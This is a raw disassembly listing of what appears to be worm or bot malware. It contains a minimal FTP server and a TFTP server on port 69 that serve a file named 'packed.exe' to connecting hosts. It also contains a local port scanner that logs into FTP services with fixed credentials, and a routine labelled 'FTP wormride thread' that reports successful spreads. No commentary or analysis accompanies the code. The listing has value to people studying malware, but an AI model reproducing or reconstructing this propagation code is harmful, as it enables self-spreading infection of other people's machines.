lea eax, [ebp-318h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053DC
add esp, 0Ch
mov [ebp-520h], eax
cmp dword ptr [ebp-520h], 0
jz short loc_411218
cmp dword ptr [ebp-520h], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: .text:0041120D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: .text:00411216�j
lea eax, [ebp-108h]
push eax
push offset dword_41C6AC
lea eax, [ebp-318h]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp-528h], eax
cmp dword ptr [ebp-528h], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: .text:00411245�j
lea eax, [ebp-108h]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp-51Ch], eax
cmp dword ptr [ebp-51Ch], 0
jnz short loc_411278
mov dword ptr [ebp-51Ch], offset byte_41DE30
loc_411278: ; CODE XREF: .text:0041126C�j
lea eax, [ebp-108h]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push dword ptr [ebp-528h]
call sub_40ED38
pop ecx
mov [ebp-524h], eax
mov eax, [ebp-524h]
sub eax, dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov dword ptr [ebp-4], 1
push offset a331 ; "331 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: .text:004112B3�j
mov eax, [ebp-524h]
sub eax, dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov dword ptr [ebp-118h], 1
push offset a230 ; "230 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: .text:00411310�j
cmp dword ptr [ebp-4], 0
jz short loc_41136C
cmp dword ptr [ebp-118h], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: .text:00411361�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: .text:0041136A�j
mov eax, [ebp-524h]
sub eax, dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset a215 ; "215 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: .text:00411384�j
mov eax, [ebp-524h]
sub eax, dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset a211 ; "211 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: .text:004113DA�j
mov eax, [ebp-524h]
sub eax, dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset a257 ; "257 \"/\" -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: .text:00411430�j
mov eax, [ebp-524h]
sub eax, dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset a200 ; "200 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: .text:00411486�j
mov eax, [ebp-524h]
sub eax, dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset a425 ; "425 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: .text:004114DC�j
mov eax, [ebp-524h]
sub eax, dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp-534h]
push eax
lea eax, [ebp-52Ch]
push eax
lea eax, [ebp-540h]
push eax
lea eax, [ebp-53Ch]
push eax
lea eax, [ebp-538h]
push eax
lea eax, [ebp-530h]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push dword ptr [ebp-51Ch]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, byte ptr [ebp-540h]
push eax
movzx eax, byte ptr [ebp-53Ch]
push eax
movzx eax, byte ptr [ebp-538h]
push eax
movzx eax, byte ptr [ebp-530h]
push eax
push offset aU_U_U_U ; "%u.%u.%u.%u"
push 100h
lea eax, [ebp-104h]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp-52Ch]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp-534h]
and ecx, 0FFh
or eax, ecx
push eax
push offset aU_0 ; "%u"
push 6
lea eax, [ebp-114h]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset a200 ; "200 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: .text:00411532�j
mov eax, [ebp-524h]
sub eax, dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset aPacked_exe ; "packed.exe"
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-548h], eax
cmp dword ptr [ebp-548h], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: .text:00411659�j
push 2
push 0
push dword ptr [ebp-548h]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-548h]
call sub_416B76 ; ftell
pop ecx
mov [ebp-544h], eax
push 0
push 0
push dword ptr [ebp-548h]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-548h]
call sub_416B82 ; fclose
pop ecx
push dword ptr [ebp-544h]
push offset a213U ; "213 %u\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: .text:00411635�j
mov eax, [ebp-524h]
sub eax, dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp-114h]
push eax
lea eax, [ebp-104h]
push eax
call sub_4050EA
add esp, 10h
mov [ebp-54Ch], eax
cmp dword ptr [ebp-54Ch], 0
jz short loc_411773
cmp dword ptr [ebp-54Ch], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: .text:00411768�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: .text:00411771�j
push offset aRb ; "rb"
push offset aPacked_exe ; "packed.exe"
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-554h], eax
cmp dword ptr [ebp-554h], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: .text:00411796�j
push 2
push 0
push dword ptr [ebp-554h]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-554h]
call sub_416B76 ; ftell
pop ecx
mov [ebp-550h], eax
push 0
push 0
push dword ptr [ebp-554h]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-554h]
call sub_416B82 ; fclose
pop ecx
push offset aPacked_exe ; "packed.exe"
push dword ptr [ebp-550h]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-54Ch]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-54Ch]
call sub_40538D
pop ecx
push offset a226 ; "226 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: .text:004116FC�j
mov eax, [ebp-524h]
sub eax, dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp-114h]
push eax
lea eax, [ebp-104h]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset a226 ; "226 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EB08
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp-558h], eax
lea eax, [ebp-104h]
push eax
push dword ptr [ebp-558h]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset aLast ; "#last"
call sub_40D4AB
add esp, 14h
push 3E8h
call ds:dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: .text:004118DF�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: .text:00411886�j
mov eax, [ebp-524h]
sub eax, dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: .text:004111E0�j
; .text:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp-518h]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp-518h]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp-518h]
push eax
push dword ptr [ebp-10Ch]
call sub_4053BF
add esp, 0Ch
push dword ptr [ebp-10Ch]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset a220_0 ; "220"
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset aUser1 ; "USER 1\r\n"
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset a331_0 ; "331"
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset aPass1 ; "PASS 1\r\n"
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset a230_0 ; "230"
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: .text:00411D5F�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
add esp, 10h
mov [ebp+var_1C4], eax
cmp [ebp+var_1C4], 0
jz short loc_411CAB
push [ebp+var_1C4]
call sub_411A09
pop ecx
test eax, eax
jz short loc_411C9F
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
cmp [ebp+var_4], 0
jnz short loc_411C76
push 2
lea eax, [ebp+var_18]
push eax
push [ebp+var_10]
call sub_404871
add esp, 0Ch
jmp short loc_411C9F
; ---------------------------------------------------------------------------
loc_411C76: ; CODE XREF: sub_411BBC+A5�j
push 2
lea eax, [ebp+var_18]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_411C9F
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411C9F: ; CODE XREF: sub_411BBC+98�j
; sub_411BBC+B8�j ...
push [ebp+var_1C4]
call sub_4053B1
pop ecx
loc_411CAB: ; CODE XREF: sub_411BBC+88�j
jmp loc_411BFD
; ---------------------------------------------------------------------------
loc_411CB0: ; CODE XREF: sub_411BBC+4F�j
cmp [ebp+var_10], 0
jnz short loc_411CC9
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_411D55
; ---------------------------------------------------------------------------
loc_411CC9: ; CODE XREF: sub_411BBC+F8�j
mov eax, [ebp+var_1C0]
push dword ptr [eax]
push offset unk_41C6DC
lea eax, [ebp+var_1BC]
push eax
call sub_40D53F
add esp, 0Ch
loc_411CE5: ; CODE XREF: sub_411BBC:loc_411D3C�j
push 3E8h
push [ebp+var_10]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1C8], eax
cmp [ebp+var_1C8], 0
jz short loc_411D2E
cmp [ebp+var_1C8], 0FFFFFFFFh
jz short loc_411D2E
push [ebp+var_1C8]
push offset loc_41113B
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_411D2E
push [ebp+var_1C8]
call sub_4053B1
pop ecx
loc_411D2E: ; CODE XREF: sub_411BBC+145�j
; sub_411BBC+14E�j ...
mov eax, [ebp+var_1C0]
cmp dword ptr [eax+4], 0
jz short loc_411D3C
jmp short loc_411D3E
; ---------------------------------------------------------------------------
loc_411D3C: ; CODE XREF: sub_411BBC+17C�j
jmp short loc_411CE5
; ---------------------------------------------------------------------------
loc_411D3E: ; CODE XREF: sub_411BBC+17E�j
push [ebp+var_10]
call sub_404CBB
pop ecx
push [ebp+var_1C0]
call sub_409763
pop ecx
xor eax, eax
locret_411D55: ; CODE XREF: sub_411BBC+DE�j
; sub_411BBC+108�j
leave
retn 4
sub_411BBC endp
; ---------------------------------------------------------------------------
loc_411D59: ; DATA XREF: sub_411D68+4E�o
push ebp
mov ebp, esp
push dword ptr [ebp+8]
call sub_411BBC
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411D68 proc near ; CODE XREF: sub_40A9CF+70F�p
; sub_40A9CF+735�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
call sub_4042FB
test eax, eax
jz short loc_411D77
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D77: ; CODE XREF: sub_411D68+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_411D8D
jmp short locret_411DC3
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411D68+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFtpWormrideThr ; "FTP wormride thread"
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset loc_411D59
call sub_4095A4
add esp, 10h
locret_411DC3: ; CODE XREF: sub_411D68+D�j
; sub_411D68+23�j
leave
retn
sub_411D68 endp
; ---------------------------------------------------------------------------
loc_411DC5: ; DATA XREF: sub_4123F6+43�o
push ebp
mov ebp, esp
sub esp, 0DACh
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-358h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp-108h], eax
cmp dword ptr [ebp-108h], 0FFFFFFFFh
jnz short loc_411E1D
push dword ptr [ebp-358h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411E1D: ; CODE XREF: .text:00411E08�j
lea eax, [ebp-104h]
push eax
call sub_40CF25
push eax
call sub_40449C
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp-1B0h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov word ptr [ebp-1B0h], 2
push 45h
call ds:dword_417238 ; htons
mov [ebp-1AEh], ax
lea eax, [ebp-104h]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp-1ACh], eax
mov dword ptr [ebp-1A0h], 1
push 4
lea eax, [ebp-1A0h]
push eax
push 4
push 0FFFFh
push dword ptr [ebp-108h]
call ds:dword_417204 ; setsockopt
push 10h
lea eax, [ebp-1B0h]
push eax
push dword ptr [ebp-108h]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_411EC2
push dword ptr [ebp-358h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411EC2: ; CODE XREF: .text:00411EAD�j
push offset aRb ; "rb"
push offset aPacked_exe ; "packed.exe"
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp-10Ch], eax
cmp dword ptr [ebp-10Ch], 0
jnz short loc_411F01
push dword ptr [ebp-108h]
call ds:dword_417230 ; closesocket
push dword ptr [ebp-358h]
call sub_409763
pop ecx
xor eax, eax
jmp loc_4123F1
; ---------------------------------------------------------------------------
loc_411F01: ; CODE XREF: .text:00411EE0�j
mov eax, [ebp-358h]
push dword ptr [eax]
push offset unk_41C788
lea eax, [ebp-354h]
push eax
call sub_40D53F
add esp, 0Ch
push 2
push 0
push dword ptr [ebp-10Ch]
call sub_416B96 ; fseek
add esp, 0Ch
push dword ptr [ebp-10Ch]
call sub_416B76 ; ftell
pop ecx
mov [ebp-4], eax
push 0
push 0
push dword ptr [ebp-10Ch]
call sub_416B96 ; fseek
add esp, 0Ch
push 80h
push 0
lea eax, [ebp-19Ch]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_411F66: ; CODE XREF: .text:loc_412084�j
; .text:loc_4123C6�j
mov dword ptr [ebp-0B64h], 1
and dword ptr [ebp-0B60h], 0
and dword ptr [ebp-0B5Ch], 0
loc_411F7E: ; CODE XREF: .text:00411FF9�j
and dword ptr [ebp-0B68h], 0
jmp short loc_411F94
; ---------------------------------------------------------------------------
loc_411F87: ; CODE XREF: .text:loc_411FB9�j
mov eax, [ebp-0B68h]
inc eax
mov [ebp-0B68h], eax
loc_411F94: ; CODE XREF: .text:00411F85�j
mov eax, [ebp-0B68h]
cmp eax, [ebp-0B5Ch]
jnb short loc_411FBB
mov eax, [ebp-0B68h]
mov eax, [ebp+eax*4-0B58h]
cmp eax, [ebp-108h]
jnz short loc_411FB9
jmp short loc_411FBB
; ---------------------------------------------------------------------------
loc_411FB9: ; CODE XREF: .text:00411FB5�j
jmp short loc_411F87
; ---------------------------------------------------------------------------
loc_411FBB: ; CODE XREF: .text:00411FA0�j
; .text:00411FB7�j
mov eax, [ebp-0B68h]
cmp eax, [ebp-0B5Ch]
jnz short loc_411FF5
cmp dword ptr [ebp-0B5Ch], 200h
jnb short loc_411FF5
mov eax, [ebp-0B68h]
mov ecx, [ebp-108h]
mov [ebp+eax*4-0B58h], ecx
mov eax, [ebp-0B5Ch]
inc eax
mov [ebp-0B5Ch], eax
loc_411FF5: ; CODE XREF: .text:00411FC7�j
; .text:00411FD3�j
xor eax, eax
test eax, eax
jnz short loc_411F7E
lea eax, [ebp-0B64h]
push eax
push 0
push 0
lea eax, [ebp-0B5Ch]
push eax
push 0
call ds:dword_41722C ; select
test eax, eax
jle loc_4123B8
mov dword ptr [ebp-0D84h], 10h
mov al, byte_41DE30
mov [ebp-0D70h], al
mov ecx, 80h
xor eax, eax
lea edi, [ebp-0D6Fh]
rep stosd
stosw
stosb
lea eax, [ebp-0D84h]
push eax
lea eax, [ebp-0D80h]
push eax
push 0
push 80h
lea eax, [ebp-19Ch]
push eax
push dword ptr [ebp-108h]
call ds:dword_417258 ; recvfrom
mov [ebp-0B6Ch], eax
cmp dword ptr [ebp-0B6Ch], 0
jz short loc_412084
cmp dword ptr [ebp-0B6Ch], 0FFFFFFFFh
jnz short loc_412089
loc_412084: ; CODE XREF: .text:00412079�j
jmp loc_411F66
; ---------------------------------------------------------------------------
loc_412089: ; CODE XREF: .text:00412082�j
movsx eax, byte ptr [ebp-19Ch]
test eax, eax
jnz loc_4121C0
movsx eax, byte ptr [ebp-19Bh]
cmp eax, 1
jnz loc_4121C0
lea eax, [ebp-19Ch]
mov [ebp-0D88h], eax
lea eax, [ebp-19Ch]
mov [ebp-0D8Ch], eax
mov eax, [ebp-0D88h]
inc eax
inc eax
mov [ebp-0D88h], eax
mov eax, [ebp-0D8Ch]
inc eax
inc eax
mov [ebp-0D8Ch], eax
push dword ptr [ebp-0D8Ch]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0D8Ch]
lea eax, [ecx+eax+1]
mov [ebp-0D8Ch], eax
push offset aOctet ; "octet"
call sub_416B40 ; strlen
pop ecx
push eax
push dword ptr [ebp-0D8Ch]
push offset aOctet ; "octet"
call sub_416BF0 ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_41213F
push dword ptr [ebp-0D84h]
lea eax, [ebp-0D80h]
push eax
push 0
push 13h
push offset dword_41C76C
push dword ptr [ebp-108h]
call ds:dword_417250 ; sendto
jmp short loc_4121BB
; ---------------------------------------------------------------------------
loc_41213F: ; CODE XREF: .text:00412119�j
push 0
push 0
push dword ptr [ebp-10Ch]
call sub_416B96 ; fseek
add esp, 0Ch
and byte ptr [ebp-0D70h], 0
mov byte ptr [ebp-0D6Fh], 3
and byte ptr [ebp-0D6Eh], 0
mov byte ptr [ebp-0D6Dh], 1
push dword ptr [ebp-10Ch]
push 200h
push 1
lea eax, [ebp-0D6Ch]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp-0D90h], eax
push dword ptr [ebp-0D84h]
lea eax, [ebp-0D80h]
push eax
push 0
mov eax, [ebp-0D90h]
add eax, 4
push eax
lea eax, [ebp-0D70h]
push eax
push dword ptr [ebp-108h]
call ds:dword_417250 ; sendto
loc_4121BB: ; CODE XREF: .text:0041213D�j
jmp loc_4123B8
; ---------------------------------------------------------------------------
loc_4121C0: ; CODE XREF: .text:00412092�j
; .text:004120A2�j
movsx eax, byte ptr [ebp-19Ch]
test eax, eax
jnz loc_412396
movsx eax, byte ptr [ebp-19Bh]
cmp eax, 4
jnz loc_412396
mov al, [ebp-19Ah]
mov [ebp-0DA0h], al
mov al, [ebp-199h]
mov [ebp-0D98h], al
and byte ptr [ebp-0D70h], 0
mov byte ptr [ebp-0D6Fh], 3
movzx eax, byte ptr [ebp-0D98h]
cmp eax, 0FFh
jnz short loc_412242
mov al, [ebp-0DA0h]
add al, 1
mov [ebp-0DA0h], al
mov al, [ebp-0DA0h]
mov [ebp-0D6Eh], al
and byte ptr [ebp-0D98h], 0
mov al, [ebp-0D98h]
mov [ebp-0D6Dh], al
jmp short loc_412268
; ---------------------------------------------------------------------------
